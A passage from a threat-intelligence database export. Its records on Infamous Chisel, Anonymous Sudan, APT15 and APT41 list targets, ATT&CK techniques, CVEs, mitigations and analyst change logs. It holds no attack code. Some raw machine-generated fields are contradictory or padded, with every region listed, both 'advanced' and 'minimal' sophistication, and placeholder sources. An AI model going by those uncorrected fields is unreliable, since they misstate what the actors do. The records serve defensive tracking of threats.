the Ukrainian military. The malware\", \" known as Infamous Chisel\", \" enables persistent access to infected Android devices over the Tor network and exfiltrates victim information.\", \" also known as GRU Main Centre for Special Technologies GTsST\", \" is a threat actor with links to the Russian GRU. They have been identified as using a new mobile malware called Infamous Chisel in a campaign targeting Android devices used by the Ukrainian military.\", \"The Infamous Chisel threat actor exhibits low to medium sophistication and shows little regard for defense evasion or concealment of malicious activity. They target specific files and directory paths related to military applications and exfiltrate sensitive data.\", \"The Infamous Chisel threat actor has been identified as a low to medium sophistication group. They have developed components with little regard to defense evasion or concealment of malicious activity. The actor searches for specific files and directory paths related to military applications for exfiltration purposes.\"], \"target_populations\": [], \"target_industry_sectors\": [], \"threat_actor_intent\": [\"Espionage\", \"Information Theft\", \"Damage and Destruction\", \"Financial Theft\", \"Disruption of Service\", \"Disinformation\", \"Credential Harvesting\", \"Creating Botnets\", \"Cyber Stalking\", \"Resource Hijacking\"], \"threat_actor_capabilities\": [\"T1569\", \"T1398\", \"T1625\", \"T1626\", \"T1629\", \"T1406\", \"T1557\", \"T1634\", \"T1040\", \"T1420\", \"T1430\", \"T1418\", \"T1426\", \"T1422\", \"T1421\", \"T1533\", \"T1074.001\", \"T1114.001\", \"T1473\", \"T1521\", \"T1572\", \"T1219\", \"T1569: System Services\", \"T1398: Boot or Logon Initialization Scripts\", \"T1625: Hijack Execution Flow\", \"T1626: Abuse Elevation Control Mechanism\", \"T1629: Impair Defenses\", \"T1406: Obfuscated Files or Information\", \"T1557: Adversary-in-the-Middle\", \"T1634: Credentials from Password Stores\", \"T1040: Network Sniffing\", \"T1420: File and Directory Discovery\", \"T1430: Location Tracking\", \"T1418: Software Discovery\", \"T1426: System Information Discovery\", \"T1422: System Network Configuration Discovery\", \"T1421: System Network Connections Discovery\", \"T1533: Data from Local System\", \"T1074.001: Data Staged: Local Data Staging\", \"T1114.001: Email Collection: Local Email Collection\", \"T1473: Application Layer Protocol\", \"T1521: Encrypted Channel\", \"T1572: Protocol Tunnelling\", \"T1219: Remote Access Software\", \"T1489: Service Stop\", \"T1489\", \"T1020\", \"T1029\", \"T1573.001\", \"T1110.001\", \"T1057\", \"T1003\", \"T1090\"], \"threat_actor_motives\": [\"Espionage\", \"Financial Gain\"], \"threat_actor_resources\": [\"government\", \"organization\", \"unknown\"], \"threat_actor_sophistication\": [\"advanced\", \"minimal\"], \"threat_actor_type\": [\"nation-state\", \"unknown\"], \"attack_mitigations\": [], \"attack_consequences\": [], \"vulnerabilities\": [\"CVE-2014-4114\", \"CVE-2017-0199\"], \"sources\": [\"pdf-link-goes-here\", \"UK National Cyber Security Centre (NCSC)\", \"U.S. National Security Agency (NSA)\", \"U.S. Cybersecurity and Infrastructure Security Agency (CISA)\", \"U.S. Federal Bureau of Investigation (FBI)\", \"New Zealand\\u2019s National Cyber Security Centre (NCSC-NZ)\", \"Canadian Centre for Cyber Security\", \"Australian Signals Directorate (ASD)\", \"Canadian Centre for Cyber Security (CSE)\", \"https://www.example.com/threat-report\"]}",
  "approval_status": "APPROVED",
  "approval_status_changed_by": "3IphbJoz6SbXJDseEV9UYT6ODfz1",
  "approval_status_changed_on": {
    "$date": "2023-09-08T18:30:07.412Z"
  },
  "approval_message": "",
  "change_log": [
    {
      "_id": {
        "$oid": "64f0edc37b91c1f23e50f50c"
      },
      "updated_by": "g9cPReJBIwRQGc7YTG41EIKhfrH2",
      "updated_on": {
        "$date": "2023-08-31T19:45:07.952Z"
      },
      "changes": [
        {
          "field": "sources",
          "previous_value": [
            "pdf-link-goes-here",
            "UK National Cyber Security Centre (NCSC)",
            "U.S. National Security Agency (NSA)",
            "U.S. Cybersecurity and Infrastructure Security Agency (CISA)",
            "U.S. Federal Bureau of Investigation (FBI)",
            "New Zealand’s National Cyber Security Centre (NCSC-NZ)",
            "Canadian Centre for Cyber Security",
            "Australian Signals Directorate (ASD)",
            "Canadian Centre for Cyber Security (CSE)",
            "https://www.example.com/threat-report"
          ],
          "updated_value": [
            "UK National Cyber Security Centre (NCSC)",
            "U.S. National Security Agency (NSA)",
            "U.S. Cybersecurity and Infrastructure Security Agency (CISA)",
            "U.S. Federal Bureau of Investigation (FBI)",
            "New Zealand’s National Cyber Security Centre (NCSC-NZ)",
            "Canadian Centre for Cyber Security",
            "Australian Signals Directorate (ASD)",
            "Canadian Centre for Cyber Security (CSE)"
          ]
        }
      ]
    },
    {
      "_id": {
        "$oid": "64f0eb6a7b91c1f23e50f50b"
      },
      "updated_by": "g9cPReJBIwRQGc7YTG41EIKhfrH2",
      "updated_on": {
        "$date": "2023-08-31T19:35:06.258Z"
      },
      "changes": [
        {
          "field": "threat_actor_intent",
          "previous_value": [
            "Espionage",
            "Information Theft",
            "Damage and Destruction",
            "Financial Theft",
            "Disruption of Service",
            "Disinformation",
            "Credential Harvesting",
            "Creating Botnets",
            "Cyber Stalking",
            "Resource Hijacking"
          ],
          "updated_value": [
            "Espionage",
            "Information Theft"
          ]
        }
      ]
    },
    {
      "_id": {
        "$oid": "64f0eb337b91c1f23e50f50a"
      },
      "updated_by": "g9cPReJBIwRQGc7YTG41EIKhfrH2",
      "updated_on": {
        "$date": "2023-08-31T19:34:11.590Z"
      },
      "changes": [
        {
          "field": "target_regions",
          "previous_value": [
            "eastern-europe",
            "africa",
            "americas",
            "asia",
            "europe",
            "oceania",
            "eastern-africa",
            "middle-africa",
            "northern-africa",
            "southern-africa",
            "western-africa",
            "caribbean",
            "central-america",
            "latin-america-caribbean",
            "northern-america",
            "south-america",
            "central-asia",
            "eastern-asia",
            "southern-asia",
            "south-eastern-asia",
            "western-asia",
            "northern-europe",
            "southern-europe",
            "western-europe",
            "antarctica",
            "australia-new-zealand",
            "melanesia",
            "micronesia",
            "polynesia"
          ],
          "updated_value": [
            "eastern-europe"
          ]
        }
      ]
    },
    {
      "_id": {
        "$oid": "64f0eabd7b91c1f23e50f509"
      },
      "updated_by": "g9cPReJBIwRQGc7YTG41EIKhfrH2",
      "updated_on": {
        "$date": "2023-08-31T19:32:13.275Z"
      },
      "changes": [
        {
          "field": "threat_actor",
          "previous_value": "Sandworm, Infamous Chisel",
          "updated_value": "Infamous Chisel"
        },
        {
          "field": "country_of_origin",
          "previous_value": "RU, unknown",
          "updated_value": "RU"
        }
      ]
    }
  ],
  "threat_actor": "Infamous Chisel"
},
{
  "_id": {
    "$oid": "64f2342face4cf04caedffe3"
  },
  "report": {
    "$oid": "64f234163c3706217c70f20a"
  },
  "threat_actor_overview": "After gaining attention in 2022,  Anonymous Sudan has emerged as a significant and politically motivated player in DDoS attacks,  closely associated and partnered with Killnet and REvil. While claiming to be a Sudan-based pro-Islamic hacktivist organization,  some researchers speculate that they may function merely as a subsidiary experimental group of Killnet.",
  "aliases": [],
  "sources": [
    "https://www.scmagazine.com/news/cybercrime/hacktivist-anonymous-sudan-bear-wolf",
    "https://www.hackread.com/microsoft-ddos-attack-cyber-attack-impact/",
    "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/killnet-anonymous-sudan-and-revil-unveil-plans-for-attacks-on-us-and-european-banking-systems/",
    "https://www.darkreading.com/attacks-breaches/anonymous-sudan-claims-responsibility-ddos-attacks-israel",
    "https://www.darkreading.com/attacks-breaches/pro-islam-anonymous-sudan-hacktivists-front-russia-killnet-operation",
    "https://www.bleepingcomputer.com/news/microsoft/microsoft-confirms-azure-outlook-outages-caused-by-ddos-attacks/",
    "https://allinfosecnews.com/topic/anonymous-sudan/"
  ],
  "country_of_origin": "SD",
  "threat_actor_motives": [
    "Financial Gain",
    "Terrorism",
    "Hacktivism",
    "Espionage",
    "Notoriety"
  ],
  "threat_actor_intent": [
    "Financial Theft",
    "Damage and Destruction",
    "Disruption of Service",
    "Information Theft"
  ],
  "threat_actor_capabilities": [
    "T1489"
  ],
  "threat_actor_type": [],
  "threat_actor_sophistication": "none",
  "target_countries": [
    "US",
    "IL",
    "DE",
    "FR",
    "NL",
    "SE"
  ],
  "target_regions": [
    "europe",
    "northern-america"
  ],
  "target_industry_sectors": [
    "x-industry-sector--37cd57c3-5b59-441c-92b0-0f28cf83c5df",
    "x-industry-sector--61b2d4fd-c6e0-457e-86a1-d787bb768f89",
    "x-industry-sector--8dcb5c72-0dc9-47dd-a5d3-7498cee712cb",
    "x-industry-sector--ac92c6e8-7936-475d-ab9f-0c12012582e6",
    "x-industry-sector--f3f4f4e2-1810-4df2-a7ac-a65c9388ed23",
    "x-industry-sector--f63a87bf-e5cf-4afb-b239-9c4d657b661f"
  ],
  "attack_mitigations": "Load balancers, Anomaly detection, Network firewalls",
  "attack_consequences": "Interruption of Service, Financial Loss",
  "vulnerabilities": [],
  "raw_serialized_analysis": "{\"threat_actor\": \"Anonymous Sudan\", \"country_of_origin\": \"SD\", \"attack_mitigations\": \"Load balancers, Anomaly detection, Network firewalls\", \"attack_consequences\": \"Interruption of Service, Financial Loss\", \"threat_actor_sophistication\": null, \"threat_actor_overview\": \"After gaining attention in 2022,  Anonymous Sudan has emerged as a significant and politically motivated player in DDoS attacks,  closely associated and partnered with Killnet and REvil. While claiming to be a Sudan-based pro-Islamic hacktivist organization,  some researchers speculate that they may function merely as a subsidiary experimental group of Killnet.\", \"target_countries\": [\"DE\", \"FR\", \"NL\", \"SE\"], \"target_regions\": [], \"target_populations\": [], \"threat_actor_intent\": [\"Disruption of Service\", \"Information Theft\"], \"target_industry_sectors\": [], \"threat_actor_capabilities\": [\"T1492\", \"T1496\", \"T1497\"], \"threat_actor_motives\": [\"Hacktivism\", \"Espionage\", \"Notoriety\"], \"threat_actor_resources\": [\"organization\"], \"threat_actor_type\": [], \"aliases\": [], \"vulnerabilities\": [], \"sources\": []}",
  "raw_openAI_analysis": "{\"threat_actor\": [\"Anonymous Sudan\"], \"aliases\": [], \"country_of_origin\": [\"SD\"], \"target_countries\": [\"DE\", \"FR\", \"NL\", \"SE\"], \"target_regions\": [], \"threat_actor_overview\": [\"After gaining attention in 2022\", \" Anonymous Sudan has emerged as a significant and politically motivated player in DDoS attacks\", \" closely associated and partnered with Killnet and REvil. While claiming to be a Sudan-based pro-Islamic hacktivist organization\", \" some researchers speculate that they may function merely as a subsidiary experimental group of Killnet.\"], \"target_populations\": [], \"target_industry_sectors\": [], \"threat_actor_intent\": [\"Disruption of Service\", \"Information Theft\"], \"threat_actor_capabilities\": [\"T1492\", \"T1496\", \"T1497\"], \"threat_actor_motives\": [\"Hacktivism\", \"Espionage\", \"Notoriety\"], \"threat_actor_resources\": [\"organization\"], \"threat_actor_sophistication\": [\"minimal\"], \"threat_actor_type\": [\"hacktivist\"], \"attack_mitigations\": [\"Load balancers\", \"Anomaly detection\", \"Network firewalls\"], \"attack_consequences\": [\"Interruption of Service\", \"Financial Loss\"], \"vulnerabilities\": [], \"sources\": []}",
  "approval_status": "APPROVED",
  "approval_status_changed_by": "g9cPReJBIwRQGc7YTG41EIKhfrH2",
  "approval_status_changed_on": {
    "$date": "2023-09-01T20:24:27.666Z"
  },
  "approval_message": "",
  "change_log": [
    {
      "_id": {
        "$oid": "64f24822cd46cfce622c3db6"
      },
      "updated_by": "g9cPReJBIwRQGc7YTG41EIKhfrH2",
      "updated_on": {
        "$date": "2023-09-01T20:22:58.188Z"
      },
      "changes": [
        {
          "field": "target_populations",
          "previous_value": [
            "64110",
            "65120",
            "35130",
            "35120"
          ],
          "updated_value": []
        }
      ]
    },
    {
      "_id": {
        "$oid": "64f239703c3706217c70f218"
      },
      "updated_by": "3IphbJoz6SbXJDseEV9UYT6ODfz1",
      "updated_on": {
        "$date": "2023-09-01T19:20:16.746Z"
      },
      "changes": [
        {
          "field": "sources",
          "previous_value": [],
          "updated_value": [
            "https://www.scmagazine.com/news/cybercrime/hacktivist-anonymous-sudan-bear-wolf",
            "https://www.hackread.com/microsoft-ddos-attack-cyber-attack-impact/",
            "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/killnet-anonymous-sudan-and-revil-unveil-plans-for-attacks-on-us-and-european-banking-systems/",
            "https://www.darkreading.com/attacks-breaches/anonymous-sudan-claims-responsibility-ddos-attacks-israel",
            "https://www.darkreading.com/attacks-breaches/pro-islam-anonymous-sudan-hacktivists-front-russia-killnet-operation",
            "https://www.bleepingcomputer.com/news/microsoft/microsoft-confirms-azure-outlook-outages-caused-by-ddos-attacks/",
            "https://allinfosecnews.com/topic/anonymous-sudan/"
          ]
        }
      ]
    },
    {
      "_id": {
        "$oid": "64f239123c3706217c70f217"
      },
      "updated_by": "3IphbJoz6SbXJDseEV9UYT6ODfz1",
      "updated_on": {
        "$date": "2023-09-01T19:18:42.882Z"
      },
      "changes": [
        {
          "field": "target_industry_sectors",
          "previous_value": [
            {
              "id": "x-industry-sector--37cd57c3-5b59-441c-92b0-0f28cf83c5df",
              "name": "financial-services",
              "description": null,
              "created": "2023-08-24 13:57:04.385000",
              "spec_version": "2.1",
              "expired": false,
              "modified": null,
              "x_included_in_stix_ov": true,
              "_cls": "XStixIndustrySector"
            },
            {
              "id": "x-industry-sector--61b2d4fd-c6e0-457e-86a1-d787bb768f89",
              "name": "energy",
              "description": null,
              "created": "2023-08-24 13:57:04.379000",
              "spec_version": "2.1",
              "expired": false,
              "modified": null,
              "x_included_in_stix_ov": true,
              "_cls": "XStixIndustrySector"
            },
            {
              "id": "x-industry-sector--8dcb5c72-0dc9-47dd-a5d3-7498cee712cb",
              "name": "insurance",
              "description": null,
              "created": "2023-08-24 13:57:04.422000",
              "spec_version": "2.1",
              "expired": false,
              "modified": null,
              "x_included_in_stix_ov": true,
              "_cls": "XStixIndustrySector"
            },
            {
              "id": "x-industry-sector--ac92c6e8-7936-475d-ab9f-0c12012582e6",
              "name": "technology",
              "description": null,
              "created": "2023-08-24 13:57:04.439000",
              "spec_version": "2.1",
              "expired": false,
              "modified": null,
              "x_included_in_stix_ov": true,
              "_cls": "XStixIndustrySector"
            },
            {
              "id": "x-industry-sector--f63a87bf-e5cf-4afb-b239-9c4d657b661f",
              "name": "government",
              "description": null,
              "created": "2023-08-24 13:57:04.390000",
              "spec_version": "2.1",
              "expired": false,
              "modified": null,
              "x_included_in_stix_ov": true,
              "_cls": "XStixIndustrySector"
            }
          ],
          "updated_value": [
            {
              "id": "x-industry-sector--f3f4f4e2-1810-4df2-a7ac-a65c9388ed23",
              "name": "infrastructure",
              "description": null,
              "created": "2023-08-24 13:57:04.410000",
              "spec_version": "2.1",
              "expired": false,
              "modified": null,
              "x_included_in_stix_ov": true,
              "_cls": "XStixIndustrySector"
            },
            {
              "id": "x-industry-sector--37cd57c3-5b59-441c-92b0-0f28cf83c5df",
              "name": "financial-services",
              "description": null,
              "created": "2023-08-24 13:57:04.385000",
              "spec_version": "2.1",
              "expired": false,
              "modified": null,
              "x_included_in_stix_ov": true,
              "_cls": "XStixIndustrySector"
            },
            {
              "id": "x-industry-sector--61b2d4fd-c6e0-457e-86a1-d787bb768f89",
              "name": "energy",
              "description": null,
              "created": "2023-08-24 13:57:04.379000",
              "spec_version": "2.1",
              "expired": false,
              "modified": null,
              "x_included_in_stix_ov": true,
              "_cls": "XStixIndustrySector"
            },
            {
              "id": "x-industry-sector--8dcb5c72-0dc9-47dd-a5d3-7498cee712cb",
              "name": "insurance",
              "description": null,
              "created": "2023-08-24 13:57:04.422000",
              "spec_version": "2.1",
              "expired": false,
              "modified": null,
              "x_included_in_stix_ov": true,
              "_cls": "XStixIndustrySector"
            },
            {
              "id": "x-industry-sector--ac92c6e8-7936-475d-ab9f-0c12012582e6",
              "name": "technology",
              "description": null,
              "created": "2023-08-24 13:57:04.439000",
              "spec_version": "2.1",
              "expired": false,
              "modified": null,
              "x_included_in_stix_ov": true,
              "_cls": "XStixIndustrySector"
            },
            {
              "id": "x-industry-sector--f63a87bf-e5cf-4afb-b239-9c4d657b661f",
              "name": "government",
              "description": null,
              "created": "2023-08-24 13:57:04.390000",
              "spec_version": "2.1",
              "expired": false,
              "modified": null,
              "x_included_in_stix_ov": true,
              "_cls": "XStixIndustrySector"
            }
          ]
        }
      ]
    },
    {
      "_id": {
        "$oid": "64f239073c3706217c70f216"
      },
      "updated_by": "3IphbJoz6SbXJDseEV9UYT6ODfz1",
      "updated_on": {
        "$date": "2023-09-01T19:18:31.469Z"
      },
      "changes": [
        {
          "field": "target_industry_sectors",
          "previous_value": [],
          "updated_value": [
            {
              "id": "x-industry-sector--61b2d4fd-c6e0-457e-86a1-d787bb768f89",
              "name": "energy",
              "description": null,
              "created": "2023-08-24 13:57:04.379000",
              "spec_version": "2.1",
              "expired": false,
              "modified": null,
              "x_included_in_stix_ov": true,
              "_cls": "XStixIndustrySector"
            },
            {
              "id": "x-industry-sector--37cd57c3-5b59-441c-92b0-0f28cf83c5df",
              "name": "financial-services",
              "description": null,
              "created": "2023-08-24 13:57:04.385000",
              "spec_version": "2.1",
              "expired": false,
              "modified": null,
              "x_included_in_stix_ov": true,
              "_cls": "XStixIndustrySector"
            },
            {
              "id": "x-industry-sector--f63a87bf-e5cf-4afb-b239-9c4d657b661f",
              "name": "government",
              "description": null,
              "created": "2023-08-24 13:57:04.390000",
              "spec_version": "2.1",
              "expired": false,
              "modified": null,
              "x_included_in_stix_ov": true,
              "_cls": "XStixIndustrySector"
            },
            {
              "id": "x-industry-sector--8dcb5c72-0dc9-47dd-a5d3-7498cee712cb",
              "name": "insurance",
              "description": null,
              "created": "2023-08-24 13:57:04.422000",
              "spec_version": "2.1",
              "expired": false,
              "modified": null,
              "x_included_in_stix_ov": true,
              "_cls": "XStixIndustrySector"
            },
            {
              "id": "x-industry-sector--ac92c6e8-7936-475d-ab9f-0c12012582e6",
              "name": "technology",
              "description": null,
              "created": "2023-08-24 13:57:04.439000",
              "spec_version": "2.1",
              "expired": false,
              "modified": null,
              "x_included_in_stix_ov": true,
              "_cls": "XStixIndustrySector"
            }
          ]
        }
      ]
    },
    {
      "_id": {
        "$oid": "64f238c83c3706217c70f215"
      },
      "updated_by": "3IphbJoz6SbXJDseEV9UYT6ODfz1",
      "updated_on": {
        "$date": "2023-09-01T19:17:28.651Z"
      },
      "changes": [
        {
          "field": "threat_actor_capabilities",
          "previous_value": [
            "T1492",
            "T1496",
            "T1497"
          ],
          "updated_value": [
            "T1489"
          ]
        }
      ]
    },
    {
      "_id": {
        "$oid": "64f238913c3706217c70f214"
      },
      "updated_by": "3IphbJoz6SbXJDseEV9UYT6ODfz1",
      "updated_on": {
        "$date": "2023-09-01T19:16:33.464Z"
      },
      "changes": [
        {
          "field": "target_populations",
          "previous_value": [],
          "updated_value": [
            "64110",
            "65120",
            "35130",
            "35120"
          ]
        }
      ]
    },
    {
      "_id": {
        "$oid": "64f237713c3706217c70f212"
      },
      "updated_by": "3IphbJoz6SbXJDseEV9UYT6ODfz1",
      "updated_on": {
        "$date": "2023-09-01T19:11:45.815Z"
      },
      "changes": [
        {
          "field": "target_regions",
          "previous_value": [],
          "updated_value": [
            "europe",
            "northern-america"
          ]
        }
      ]
    },
    {
      "_id": {
        "$oid": "64f236b13c3706217c70f211"
      },
      "updated_by": "3IphbJoz6SbXJDseEV9UYT6ODfz1",
      "updated_on": {
        "$date": "2023-09-01T19:08:33.442Z"
      },
      "changes": [
        {
          "field": "target_countries",
          "previous_value": [
            "DE",
            "FR",
            "NL",
            "SE"
          ],
          "updated_value": [
            "US",
            "IL",
            "DE",
            "FR",
            "NL",
            "SE"
          ]
        }
      ]
    },
    {
      "_id": {
        "$oid": "64f2366b3c3706217c70f20f"
      },
      "updated_by": "3IphbJoz6SbXJDseEV9UYT6ODfz1",
      "updated_on": {
        "$date": "2023-09-01T19:07:23.626Z"
      },
      "changes": [
        {
          "field": "threat_actor_resources",
          "previous_value": [],
          "updated_value": [
            "government"
          ]
        }
      ]
    },
    {
      "_id": {
        "$oid": "64f236603c3706217c70f20e"
      },
      "updated_by": "3IphbJoz6SbXJDseEV9UYT6ODfz1",
      "updated_on": {
        "$date": "2023-09-01T19:07:12.231Z"
      },
      "changes": [
        {
          "field": "threat_actor_resources",
          "previous_value": [
            "organization"
          ],
          "updated_value": []
        }
      ]
    },
    {
      "_id": {
        "$oid": "64f236533c3706217c70f20d"
      },
      "updated_by": "3IphbJoz6SbXJDseEV9UYT6ODfz1",
      "updated_on": {
        "$date": "2023-09-01T19:06:59.326Z"
      },
      "changes": [
        {
          "field": "threat_actor_intent",
          "previous_value": [
            "Disruption of Service",
            "Information Theft"
          ],
          "updated_value": [
            "Financial Theft",
            "Damage and Destruction",
            "Disruption of Service",
            "Information Theft"
          ]
        }
      ]
    },
    {
      "_id": {
        "$oid": "64f235843c3706217c70f20c"
      },
      "updated_by": "3IphbJoz6SbXJDseEV9UYT6ODfz1",
      "updated_on": {
        "$date": "2023-09-01T19:03:32.337Z"
      },
      "changes": [
        {
          "field": "threat_actor_motives",
          "previous_value": [
            "Terrorism",
            "Hacktivism",
            "Espionage",
            "Notoriety"
          ],
          "updated_value": [
            "Financial Gain",
            "Terrorism",
            "Hacktivism",
            "Espionage",
            "Notoriety"
          ]
        }
      ]
    },
    {
      "_id": {
        "$oid": "64f2353e3c3706217c70f20b"
      },
      "updated_by": "3IphbJoz6SbXJDseEV9UYT6ODfz1",
      "updated_on": {
        "$date": "2023-09-01T19:02:22.800Z"
      },
      "changes": [
        {
          "field": "threat_actor_motives",
          "previous_value": [
            "Hacktivism",
            "Espionage",
            "Notoriety"
          ],
          "updated_value": [
            "Terrorism",
            "Hacktivism",
            "Espionage",
            "Notoriety"
          ]
        }
      ]
    }
  ],
  "threat_actor": "Anonymous Sudan",
  "threat_actor_resources": [
    "government"
  ]
},
{
  "_id": {
    "$oid": "64f238e0ace4cf04caedffe8"
  },
  "report": {
    "$oid": "64f2379b3c3706217c70f213"
  },
  "threat_actor_overview": "APT15,  also known as Nickel,  Flea,  Ke3Chang,  and Vixen Panda,  is a Chinese state-funded APT group that has been active since at least 2004. They primarily focus on targeting public and private organizations as well as foreign affairs ministries in the Americas from 2022 to present day 2023.",
  "aliases": [
    "Nickel",
    "Flea",
    "Ke3Chang",
    "Vixen Panda"
  ],
  "sources": [
    "BleepingComputer",
    "DarkReading",
    "Heimdall Security",
    "MITRE ATT&CK",
    "The Record"
  ],
  "country_of_origin": "CN",
  "threat_actor_motives": [
    "Espionage"
  ],
  "threat_actor_intent": [
    "Espionage"
  ],
  "threat_actor_capabilities": [],
  "threat_actor_resources": [
    "government"
  ],
  "threat_actor_type": [
    "nation-state"
  ],
  "threat_actor_sophistication": "intermediate",
  "target_countries": [
    "IR",
    "US",
    "CA",
    "MX"
  ],
  "target_regions": [
    "africa",
    "americas"
  ],
  "target_populations": [],
  "target_industry_sectors": [
    "x-industry-sector--37cd57c3-5b59-441c-92b0-0f28cf83c5df",
    "x-industry-sector--45b3f739-670b-4565-ab2b-ad9a20cb35cb",
    "x-industry-sector--f63a87bf-e5cf-4afb-b239-9c4d657b661f"
  ],
  "attack_mitigations": "Utilize zero trust procedures when choosing VPN services to use. Train staff in phishing awareness. Secure exposed endpoints.",
  "attack_consequences": "Loss of data, Financial loss",
  "vulnerabilities": [
    "CVE-2020-1472"
  ],
  "raw_serialized_analysis": "{\"threat_actor\": \"APT15\", \"country_of_origin\": \"CN\", \"attack_mitigations\": \"\", \"attack_consequences\": \"Loss of data, Financial loss\", \"threat_actor_sophistication\": null, \"threat_actor_overview\": \"APT15,  also known as Nickel,  Flea,  Ke3Chang,  and Vixen Panda,  is a Chinese state-funded APT group that has been active since at least 2004. They primarily focus on targeting public and private organizations as well as foreign affairs ministries in the Americas from 2022 to present day 2023.\", \"target_countries\": [\"US\", \"CA\", \"BR\", \"MX\", \"IR\"], \"target_regions\": [\"americas\"], \"target_populations\": [], \"threat_actor_intent\": [\"Espionage\"], \"target_industry_sectors\": [\"government\", \"communications\"], \"threat_actor_capabilities\": [], \"threat_actor_motives\": [\"Espionage\"], \"threat_actor_resources\": [\"government\"], \"threat_actor_type\": [\"nation-state\"], \"aliases\": [\"Nickel\", \"Flea\", \"Ke3Chang\", \"Vixen Panda\"], \"vulnerabilities\": [], \"sources\": [\"BleepingComputer\", \"DarkReading\", \"Heimdall Security\", \"MITRE ATT&CK\", \"The Record\"]}",
  "raw_openAI_analysis": "{\"threat_actor\": [\"APT15\"], \"aliases\": [\"Nickel\", \"Flea\", \"Ke3Chang\", \"Vixen Panda\"], \"country_of_origin\": [\"CN\"], \"target_countries\": [\"US\", \"CA\", \"BR\", \"MX\", \"IR\"], \"target_regions\": [\"americas\", \"middle-east\"], \"threat_actor_overview\": [\"APT15\", \" also known as Nickel\", \" Flea\", \" Ke3Chang\", \" and Vixen Panda\", \" is a Chinese state-funded APT group that has been active since at least 2004. They primarily focus on targeting public and private organizations as well as foreign affairs ministries in the Americas from 2022 to present day 2023.\"], \"target_populations\": [], \"target_industry_sectors\": [\"government\", \"communications\", \"finance\"], \"threat_actor_intent\": [\"Espionage\"], \"threat_actor_capabilities\": [], \"threat_actor_motives\": [\"Espionage\"], \"threat_actor_resources\": [\"government\"], \"threat_actor_sophistication\": [], \"threat_actor_type\": [\"nation-state\"], \"attack_mitigations\": [], \"attack_consequences\": [\"Loss of data\", \"Financial loss\"], \"vulnerabilities\": [], \"sources\": [\"BleepingComputer\", \"DarkReading\", \"Heimdall Security\", \"MITRE ATT&CK\", \"The Record\"]}",
  "approval_status": "APPROVED",
  "approval_status_changed_by": "3IphbJoz6SbXJDseEV9UYT6ODfz1",
  "approval_status_changed_on": {
    "$date": "2023-09-01T20:31:27.217Z"
  },
  "approval_message": "",
  "change_log": [
    {
      "_id": {
        "$oid": "64f2420e64846c9b5282dd9e"
      },
      "updated_by": "g9cPReJBIwRQGc7YTG41EIKhfrH2",
      "updated_on": {
        "$date": "2023-09-01T19:57:02.095Z"
      },
      "changes": [
        {
          "field": "vulnerabilities",
          "previous_value": [],
          "updated_value": [
            "CVE-2020-1472"
          ]
        },
        {
          "field": "attack_mitigations",
          "previous_value": "",
          "updated_value": "Utilize zero trust procedures when choosing VPN services to use. Train staff in phishing awareness. Secure exposed endpoints."
        }
      ]
    },
    {
      "_id": {
        "$oid": "64f2412064846c9b5282dd9d"
      },
      "updated_by": "g9cPReJBIwRQGc7YTG41EIKhfrH2",
      "updated_on": {
        "$date": "2023-09-01T19:53:04.350Z"
      },
      "changes": [
        {
          "field": "target_industry_sectors",
          "previous_value": [
            {
              "id": "x-industry-sector--f63a87bf-e5cf-4afb-b239-9c4d657b661f",
              "name": "government",
              "description": null,
              "created": "2023-08-24 13:57:04.390000",
              "spec_version": "2.1",
              "expired": false,
              "modified": null,
              "x_included_in_stix_ov": true,
              "_cls": "XStixIndustrySector"
            },
            {
              "id": "x-industry-sector--45b3f739-670b-4565-ab2b-ad9a20cb35cb",
              "name": "communications",
              "description": null,
              "created": "2023-08-24 13:57:04.368000",
              "spec_version": "2.1",
              "expired": false,
              "modified": null,
              "x_included_in_stix_ov": true,
              "_cls": "XStixIndustrySector"
            }
          ],
          "updated_value": [
            {
              "id": "x-industry-sector--37cd57c3-5b59-441c-92b0-0f28cf83c5df",
              "name": "financial-services",
              "description": null,
              "created": "2023-08-24 13:57:04.385000",
              "spec_version": "2.1",
              "expired": false,
              "modified": null,
              "x_included_in_stix_ov": true,
              "_cls": "XStixIndustrySector"
            },
            {
              "id": "x-industry-sector--f63a87bf-e5cf-4afb-b239-9c4d657b661f",
              "name": "government",
              "description": null,
              "created": "2023-08-24 13:57:04.390000",
              "spec_version": "2.1",
              "expired": false,
              "modified": null,
              "x_included_in_stix_ov": true,
              "_cls": "XStixIndustrySector"
            },
            {
              "id": "x-industry-sector--45b3f739-670b-4565-ab2b-ad9a20cb35cb",
              "name": "communications",
              "description": null,
              "created": "2023-08-24 13:57:04.368000",
              "spec_version": "2.1",
              "expired": false,
              "modified": null,
              "x_included_in_stix_ov": true,
              "_cls": "XStixIndustrySector"
            }
          ]
        }
      ]
    },
    {
      "_id": {
        "$oid": "64f2410564846c9b5282dd9c"
      },
      "updated_by": "g9cPReJBIwRQGc7YTG41EIKhfrH2",
      "updated_on": {
        "$date": "2023-09-01T19:52:37.813Z"
      },
      "changes": [
        {
          "field": "target_regions",
          "previous_value": [
            "americas"
          ],
          "updated_value": [
            "africa",
            "americas"
          ]
        }
      ]
    },
    {
      "_id": {
        "$oid": "64f23ea764846c9b5282dd9b"
      },
      "updated_by": "g9cPReJBIwRQGc7YTG41EIKhfrH2",
      "updated_on": {
        "$date": "2023-09-01T19:42:31.257Z"
      },
      "changes": [
        {
          "field": "target_countries",
          "previous_value": [
            "US",
            "CA",
            "MX"
          ],
          "updated_value": [
            "IR",
            "US",
            "CA",
            "MX"
          ]
        }
      ]
    },
    {
      "_id": {
        "$oid": "64f23b0a3c3706217c70f21a"
      },
      "updated_by": "g9cPReJBIwRQGc7YTG41EIKhfrH2",
      "updated_on": {
        "$date": "2023-09-01T19:27:06.112Z"
      },
      "changes": [
        {
          "field": "target_countries",
          "previous_value": [
            "US",
            "CA",
            "BR",
            "MX",
            "IR"
          ],
          "updated_value": [
            "US",
            "CA",
            "MX"
          ]
        }
      ]
    },
    {
      "_id": {
        "$oid": "64f23a003c3706217c70f219"
      },
      "updated_by": "g9cPReJBIwRQGc7YTG41EIKhfrH2",
      "updated_on": {
        "$date": "2023-09-01T19:22:40.162Z"
      },
      "changes": [
        {
          "field": "threat_actor_sophistication",
          "previous_value": "none",
          "updated_value": "intermediate"
        }
      ]
    }
  ],
  "threat_actor": "APT15"
},
{
  "_id": {
    "$oid": "64f250729030374eeaa75d10"
  },
  "report": {
    "$oid": "64f25040cd46cfce622c3dc1"
  },
  "threat_actor_overview": "APT 41 is a Chinese state-sponsored threat group known for financial gain and cyber espionage. They have been operational since at least 2007 and target organizations and government agencies for intellectual property theft.",
  "aliases": [
    "Axiom",
